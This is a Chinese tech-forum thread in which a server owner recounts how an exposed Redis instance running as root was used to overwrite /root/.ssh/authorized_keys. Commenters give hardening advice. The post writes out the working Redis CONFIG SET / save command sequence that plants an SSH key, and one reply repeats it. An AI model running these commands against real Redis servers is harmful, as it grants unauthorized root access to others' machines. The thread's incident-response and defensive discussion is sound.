这是一个创建于 3628 天前的主题,其中的信息可能已经有所发展或是发生改变。
使用 config 可以随意修改文件,比如 /root/authorized_keys
.. 吓死宝宝了
第 1 条附言 2015-11-08 08:56:05 +08:00
夜里五点收到 aliyun 异地登陆报警,一开始以为是 1024 的锅。。
ps:阿里云这台是平时折腾用的,其他服务器不在阿里云。
一开始连不上, key ,密码都不行,使用 aliyun 后台修改了 root 密码,可以登陆了。
接着检查到 `/root/.ssh/authorized_keys` 发现 REDIS0006 字样开头,开始检查 redid ,发现是用 0.0.0.0 在监听,切使用 root 用户启动的 redid 。改 bind ,开 iptables 。
然后检查其他不在阿里云的服务器,发现都登不上,忽然有点慌,想让机房重置密码。
后来想到 redis 出的问题我是不是也可以利用,于是乎,
config set dir /root/.ssh/
config set dbfilename authorized_keys
set xxxx "\n\n\nssh-rsa zzzzzzzzzzzzzzzzzzzz\n\n\n"
save
我也可以登陆了。。。。修改 authorized_keys , bind , iptables 。。。。
上面就是完整经历
ps:阿里云这台是平时折腾用的,其他服务器不在阿里云。
一开始连不上, key ,密码都不行,使用 aliyun 后台修改了 root 密码,可以登陆了。
接着检查到 `/root/.ssh/authorized_keys` 发现 REDIS0006 字样开头,开始检查 redid ,发现是用 0.0.0.0 在监听,切使用 root 用户启动的 redid 。改 bind ,开 iptables 。
然后检查其他不在阿里云的服务器,发现都登不上,忽然有点慌,想让机房重置密码。
后来想到 redis 出的问题我是不是也可以利用,于是乎,
config set dir /root/.ssh/
config set dbfilename authorized_keys
set xxxx "\n\n\nssh-rsa zzzzzzzzzzzzzzzzzzzz\n\n\n"
save
我也可以登陆了。。。。修改 authorized_keys , bind , iptables 。。。。
上面就是完整经历
第 2 条附言 2015-11-08 09:09:52 +08:00
各位大神,为什么我的 /root/.ssh/authorized_keys 权限 644 也可以 key 登陆,确实有点奇怪,配服务器的时候因为自己的 key 也无法登陆执行过 restorecon -r ~/.ssh/
 | 1 Zzzzzzzzz 2015-11-08 08:31:50 +08:00  3 没 bind 127.0.0.1 只是问题之一 iptables 没对固定的几个端口开放白名单问题之二 问题之三是 redis 有权改 /root/下的文件说明是以 root 跑的 redis, 这是最大的问题 |
 | 2 void1900 OP @Zzzzzzzzz iptable 不知道谁关了,以前是靠 iptable 限制只本地的,就忽略了 bind 参数,还好收到 aliyun 异地登陆通知! redis 怎么用其他用户跑? `su xxx` 再启动? |
 | 3 raingolee 2015-11-08 08:47:32 +08:00 via iPhone 用 root 起了 redis? |
 | 5 msg7086 2015-11-08 08:50:05 +08:00 你 redis 怎么从 redis 账号提权修改 root 文件的…… |
| 7 msg7086 2015-11-08 09:01:15 +08:00 1 @void1900 随便抓个发行版( Ubuntu Debian Arch )里带的 redis 都是用 redis 用户启动的。 真没见过哪个会用 root 启动 redis …… PS: 善意提醒,一旦 root 用户被人登录过,请老老实实重装系统以及重新排查程序里可能被植入的木马。 |
 | 8 binux 2015-11-08 09:02:24 +08:00 config set dir /root/.ssh/ config set dbfilename authorized_keys set xxxx "\n\n\nssh-rsa zzzzzzzzzzzzzzzzzzzz\n\n\n" save 并不能登录, authorized_keys 的权限不是 600 |
 | 9 ETiV 2015-11-08 09:05:39 +08:00 via iPhone 能想到这么搞的人脑洞真是大啊…… |
| 10 void1900 OP @binux 为什么我的可以。。。 略微奇怪,我配服务器的时候因为自己的 key 都登陆不了,执行过 `restorecon -r /root/.ssh/` |
| 11 void1900 OP @msg7086 谢谢,不过目前还没这考虑,因为东西比较多,不过有做异地备份,而且是半夜几点,多台服务器,而且没有把利用的漏洞关上,感觉是批量跑的。 |
 | 12 lightening 2015-11-08 09:11:20 +08:00 所以要把 Redis 装在 Docker 里…… |
| 14 raingolee 2015-11-08 09:18:25 +08:00 @void1900 恩切用户再启动就行 --- 为什么我的 /root/.ssh/authorized_keys 权限 644 也可以 key 登陆,确实有点奇怪,配服务器的时候因为自己的 key 也无法登陆执行过 restorecon -r ~/.ssh/ 这个你确认是 644 然后用 root key 登陆的嘛 |
| 15 void1900 OP @raingolee 确定 shh [email protected] 不需要输入密码就登陆了。 |
| 16 void1900 OP @raingolee 确定 shh [email protected] 不需要输入密码就登陆了。 |
| 17 msg7086 2015-11-08 09:21:13 +08:00 @raingolee 手动编译的话当然安装也要自己配置了。 你写 systemd 启动配置脚本的时候得加上 user/group 才行。 |
| 18 void1900 OP @raingolee -rw-r--r--. 1 root root 123 11 月 7 19:16 authorized_keys |
 | 19 kaneg 2015-11-08 09:39:04 +08:00 via iPhone 应该禁用 root 直接登录,用 sudo |
 | 20 yytsjq 2015-11-08 10:29:16 +08:00 本机使用的话, Redis 使用 UNIX sock 连接方式呢?是不是更安全些。。 |
 | 21 varrily 2015-11-08 10:38:54 +08:00 用 ufw 端口白名单了 |
 | 22 ryd994 2015-11-08 10:50:39 +08:00 一般该用 socks 文件吧…… 不仅安全,性能也更好 |
 | 23 BOYPT 2015-11-08 11:51:36 +08:00 编译党的常见问题~ |
 | 24 dongxiaozhuo 2015-11-08 12:28:49 +08:00 @BOYPT 不只是编译党,好多开发觉得麻烦,各种喜欢开全端口。 |
 | 25 kn007 2015-11-08 12:30:01 +08:00 centos 编译党,表示使用 daemon 指定用户创建进程。 |
| 26 msg7086 2015-11-08 14:38:00 +08:00 @dongxiaozhuo 现在很多发行版的默认设定下就算端口全开也问题不大。 就是 ssh 得装个 fail2ban 。 |
 | 27 hisway 2015-11-09 14:44:41 +08:00 看来不断有人在扫这些端口~ |
| 28 void1900 OP |
Select Language